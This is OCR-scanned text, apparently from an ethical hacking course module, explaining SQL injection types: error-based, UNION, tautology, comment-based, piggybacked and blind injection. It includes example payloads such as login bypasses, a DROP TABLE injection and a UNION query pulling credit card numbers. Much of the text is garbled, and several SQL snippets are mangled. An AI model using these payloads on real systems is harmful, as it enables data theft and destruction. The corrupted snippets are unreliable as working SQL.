satineaion) (7
e
Mepafewcty
satinjection
ss
vo

(Deoteen 1Gline Comment

Se (Frenne
Bet {

Figure of SAL
15.7-Types Injection

ical andCountermensores
Mackin ©by E-Comel
Copyright
 In-BandSQL
Injection
(0 Atachrs
channel
he
use the same

of SQL
communieation to perform attackand

‘Typesin-band Injection
etree theets

Trorbared
SOL onsen,
Injection

ents tht
‘eacesnetonaysere baingtit heey
‘Tewelosy
[Peas ut rsa eo he quis

‘egal/Logealy
Incorrect Overy

$0LInjecu

In-BandSQL Injection
In in-bandSQLinjection,
attackersuse the samecommunication channelto perform
theattack
and retrieve the results.Depending
on the techniqueused,
there are various typesof in-band
SQLinjectionattacks.The most commonly usedin-bandSQLinjectionattacksare error-based
SQLinjection andUNION SALinjection.
Thedifferent
typesofin-band SQLinjection a re asfollows:
=
Error-based SQLInjection
attackerintentionally
‘An inserts bad inputsinto a n application,
causingit to return
database errors. Theattackerreadsthe resulting database-level
error messages to find
an SQL injectionvulnerability
in the application.Accordingly,
the attackerthen injects
designed
SQLqueriesthat are specifically to compromisethe data securityof the
application,
Thisapproachis veryusefulto builda vulnerability-exploiting
request.
SystemStoredProcedure
Theriskof executinga malicious SQLquery i n a storedprocedure
increases if the web
applicationdoes not sanitize the user inputsused to dynamically construct SQL
statements for that storedprocedure.
An attackermay use maliciousinputs execute
the maliciousSQLstatements in the storedprocedure.
storedprocedures theirattacks.
to perpetrate
Attackersexploit
databases’ to
For example,
Create procedureLogin @user_name varchar (20), @password
varchar (20) As Declare @query
1 from usertable
=
‘+ Gpassword
Where username
exec(@query)
varchar (250) Set @query ‘ Select

Go
‘
+ @user_name
+ ‘ and password
=
=
ical andCountermensores
Mackin ©by E-Comel
Copyright
 enters
following
Iftheattacker
stored procedure
password.
running
the
in the backend, he/she
inputfieldsusingtheabove
inputsi n the application
will be able to loginwith any

or 1=1'anypassword
Userinput:anyusername
IMlegal/Logically
IncorrectQuery
attackermaygainknowledge
‘An illegal/logically
byinjecting suchas
incorrect requests
injectable parameters, data types,n ames of tables,and so on. In this SQLinjection
attack,an attackerintentionally sendsa n incorrect query to thedatabaseto generate
an
error message that maybe usefulfor performing furtherattacks.Thistechniquemay
helpa n attackerto extract the structure of the underlyingdatabase.
For example, to find the columnname, an attackermaygive the following malicious
input:
Username:
'Bob―
Theresultantquerywill be
SELECT * FROMUsers WHEREUserName = 'Bob"' AND password=
the abovequery, the databasemay return the following
After executing error message:

"Incorrect
Syntaxnear Unclosed
‘Bob’. m
quotation arkafterthe characterstring AND
"

Password="xxx"
UNION
SQL
Injection
The“UNION SELECT― statement returns the union of the intended datasetand the
targetdataset.In a UNIONSQLinjection, an attackeruses a UNIONclause to append a
malicious queryto the requested query,as showni n the following example:
SELECT Name, Phone,Address FROM Users WHERE Td=1 UNION ALL
SELECT creditCardNumber,1,1 FROM CreditCardrable

Theattacker checks forthe UNIONSQLinjection vulnerability

byadding a singlequote
will telltheattacker of id="
character(")to the end a ".php? command.
if thedatabase
Thetypeof error message
is vulnerableto a UNIONSQL injection.
received

Tautology
Ina tautology-based SQLinjection
attack,an attackerusesa conditionalO Rclausesuch
to bypass of
that the condition theWHEREclausewill always
user authentication.
be true. Suchan attackcan be used

Forexample,
SELECT * FROMusers WHEREname
= ‘’
OR Vs
Thisquerywill always
betrue,as thesecondpartof theORclauseis always
true.

ical andCountermensores
Mackin ©by E-Comel
Copyright
End-of-Line Comment
In this typeof SQLinjection, SQLinjection
an attackeruses line comments in specific
inputs.Comments i n a line of codeare often denotedby(-~), andtheyare ignored by
the query.An attackertakesadvantage of thiscommenting featurebywritinga line of
code that ends i n a comment. Thedatabasewill execute the codeuntil it reachesthe
commented portion,afterwhichit will ignorethe rest of the query.
For
example,
SELECT * FROMmembers WHEREusername
"password! = 'admin'--' AND password=

Withthisquery,an attackerc an loginto an adminaccount withoutthe password, as the

will ignorethe comments that begin
databaseapplication immediately after username =

‘admin’,
InclineComments
Attackerssimplify
an SQL attackbyintegrating
injection multiple
vulnerableinputs
into
query usingin-line comments. This typeof injections
a single allowsan attackerto
bypassblacklisting,
remove spaces,obfuscate,anddeterminedatabaseversions.

For
example,
INSERT INTO Users (UserName,isAdmin, Password)VALUES
(" $username." 0, '.$password."")"
querythatprompts
isa dynamic
user
a new to enter a username andpassword
Theattackermayprovide
UserName
=
Attacker’, malicious
inputs
1, /* as
follows.
Password
=*/'mypwd
After these maliciousinputs are injected,
the generated
query givesthe attacker
administratorprivileges
INSERT INTO Users (UserName,isAdmin, Password)

VALUES (‘Attacker', 1, /*", 0, ‘*/’mypwd’)

Pigeybacked Query
In a piggybacked SQLinjection attack,
an attackerinjectsa n additionalmaliciousquery
into the originalquery.Thistypeof injection is generally performed on batchedSQL
queries.Theoriginal query remains unmodified, andthe attacker'squery is piggybacked
o n the original
query.Owing to piggybacking,
the DBMS receives multiple SQLqueries.
Attackersuse a semicolon(;) as a query delimiter to separate the queries.After
executing the original
query,the DBMSrecognizes the delimiterandthen executesthe
piggybacked query.Thistypeof attackis alsoknownas a stackedqueriesattack.The
intention of the attackeris to extract,add,modify, or delete data, execute remote
or perform
‘commands, a DoSattack.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Forexample, SQLqueryis as follows
the original
SELECT *
FROM EMP WHEREEMP.EID = 1001 AND EMP.ENAME = ‘Bob’
Now,the attacker
query as follows:concatenates
(;)the delimiter andthe malicious
queryto theoriginal

SELECT * FROMEMPWHEREEMP.EID = 1001 AND EMP.ENAME= ‘Bob’;

DROPTABLE DEPT;
After executingthe first query and returning
the resultantdatabaserows, the DBMS
recognizesthe delimiterand executesthe injected maliciousquery.Consequently,
the
theDEPT
DBMSdrops table
from thedatabase.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ErrorBasedSQL
Injection
ror based

‘This
forces
Sa Injection thedatabase

explotatonmaydiferdepending
to perform

onthe DBMS
in
some operationwhichtherepli

Thematisous
request
would
bef Ore 08: TEMS. nose oore untnoen

ErrorBasedSQL Injection
Let us understandthedetailsoferror-based SQLinjection. As discussed earlier,i n error-based
SQLinjection,the attackerforcesthe databaseto return error messages i n response to his/her
inputs.Later,the attackermay analyze the error messages obtainedfromthe underlying
databaseto gather informationthat can be usedfor constructing the maliciousquery. The
attackerusesthis typeof SQLinjection technique whenhe/she is unable to exploitany other
SQLinjectiontechniques directly.
The primarygoalof this technique is to generate the error
message fromthe database, whichcan be usedto perform a successful SQLinjection attack.
Such exploitation
maydifferfromone DBMSto another.

Consider
SELECT
the
* SQL
following
query:
product=$id_product
FROM productsWHEREid
Consider
the request that executesthe query above:
to a script

The
malicious
request .
http://wwwexample.com/product
php?id=10
Oracle
wouldbe(e-g., 10g):
http://www
.
example.com/product
php?
id=10| |UTL_INADDR.GET_HOST_NAME(
(SELECTuser FROMDUAL) )—
In example,
theaforementioned the tester concatenatesthe value10 with the resultof the
functionUTL_INADDR.GET_HOST_NAME. ThisOraclefunctionwill try to return the hostname
passed
of the parameter to it, whichis anotherquery,i.e., the name of the user. Whenthe
databaselooksfor a hostnamewith the user databasename, it will fall and return an error
messagesuchas
ORA-292257: host SCOTT unknown
Then,
the tester can manipulate passed
the parameter to the GET_HOST_NAME()
functionand
‘the
result
will
beshowni n theerror
message.
Module5 Page2020 ical andCountermensores
Mackin
©
Copyright
by E-Comel
 Union SQL
Injection
1GThistechique
involves
query
ein
exginal
the
a forged tothe query

ofof
|G T he result
ofa forgedquery willbe
joinedto resultoftheorginal query,thereby allowing
obtain thevalves fils
Into othera bles

Union SQL Injection

Ina UNIONSQLinjection,
an attackercombinesa forged
query with a query requestedbythe
Theresultofthe forged
user usinga UNIONclause. querywill beappended theresultof the
original
query,whichmakesit possibleto obtainthe valuesof fieldsfromothertables.Before
runningthe UNION SQLinjection, the attackerensures that thereis an equalnumberof
columns
taking partin the UNIONquery.Tofind the right of columns,
number
theattackerfirst
launchesa queryusingan ORDERBYclausefollowedbya numberto indicatethe numberof
databasecolumnsselected:
ORDERBY 10-~
If the query is executedsuccessfully and no error message appears,then the attackerwill
assume that 10 or more columns exist i n the target
databasetable. However,if the application
displays an error message suchas “Unknown column‘10!
in ‘order
clause―,
then the attacker
will assume that thereare lessthan 10 columnsi n the target databasetable.Through trial and
error, an attackercan learnthe exact numberofcolumnsin the targetdatabase table.
Oncethe attackerlearnsthe numberof columns,
the next stepis to find the typeof columns
using
such
as
a query
UNION SELECT 1,nul1,null—
Ifthe query is executedsuccessfully,
thenthe attackerknowsthat the firstcolumnis of integer
typeandhe/she the typesofthe othercolumns,
can move on to learning
UNIONSQL
Oncethe attackerfindsthe rightnumbercolumns,the next stepis to perform
injection,

ical andCountermensores
Mackin ©by E-Comel
Copyright
Satinecton|

For
example,
SELECT Name, Phone,Address FROM Users WHERE Ii

setfollowing
Now, the Idvalue:
$id=1 UNION ALL SELECT creditCardNumber,1,1FROM CreditCardTable
attacker
‘The now launchesa UNIONSQL queryasfollows:
injection
SELECT Name, Phone,Address FROM Users WHERE Id=1 UNION ALL SELECT
creditcardNumber,1,1FROM CreditCardTable
Theabovequeryjoinstheresultof the original
querywith allthecreditcardusers.

Module5 2022
Page tical andCountermensores
Making Copyright©
by Comet
 Blind/Inferential SQL
Injection

but
the
results an
{©BlindSatInjection whena webapplication
is used
ofthe injection
ae no visible
t othe
is vulnerable
attacker
to SAL injection,

Generic
SAL SAL
Blind injectionis identical
age is splayed
to # normal Injection,except
whenan attacker
that a genericcustom
an application
to exploit ratherthan

useful
eeror
attempts
Page Seeing3 message

anew
Thistypeofatackcanbecome ime-intensive because
craftedforeachbitrecovered
statement must

Blind/Inferential SQL Injection

BlindSQLInjection i s usedwhena web application is vulnerableto an SQlL injectionbut the
resultsof the injectionare not visibleto the attacker.BlindSQL injectionis identicalto a normal
SQLInjection exceptthat whenan attackerattemptsto exploit an application, he/she s eesa
genericcustom pageinsteadof a usefulerror message.
In blindSQLinjection,
an attackerposes
to the databaseto determinewhetherthe application
a true or falsequestion is vulnerableto
SQLinjection.
attackis oftenpossible
AnormalSQLinjection whenthedeveloper
usesgenericerror messages
whenevera n error hasoccurredi n the database.Suchgenericmessages mayrevealsensitive
informationor give a path to the attackerto perform a n SQLinjection attackon the application.
However, whendevelopers turn off the genericerror message for the application,itis difficult

to
for the attacker perform
suchan application
injection
an SQL attack.Nevertheless,
injection itis not impossible
with an SQLinjectionattack.Blind injectiondiffersfrom normalSQL
i n the manner of retrieving
to exploit

datafromthe database.Attackersuse blind SQLinjection

either to accesssensitive dataor to destroy data.Attackerscan stealdata byasking a series of
true or falsequestions through SQLstatements.Theresultsof the injectionare not visibleto
the attacker.Thistypeof attackcan become time-intensive becausethe database should
generate a new statement for eachnewly recoveredbit.

ical and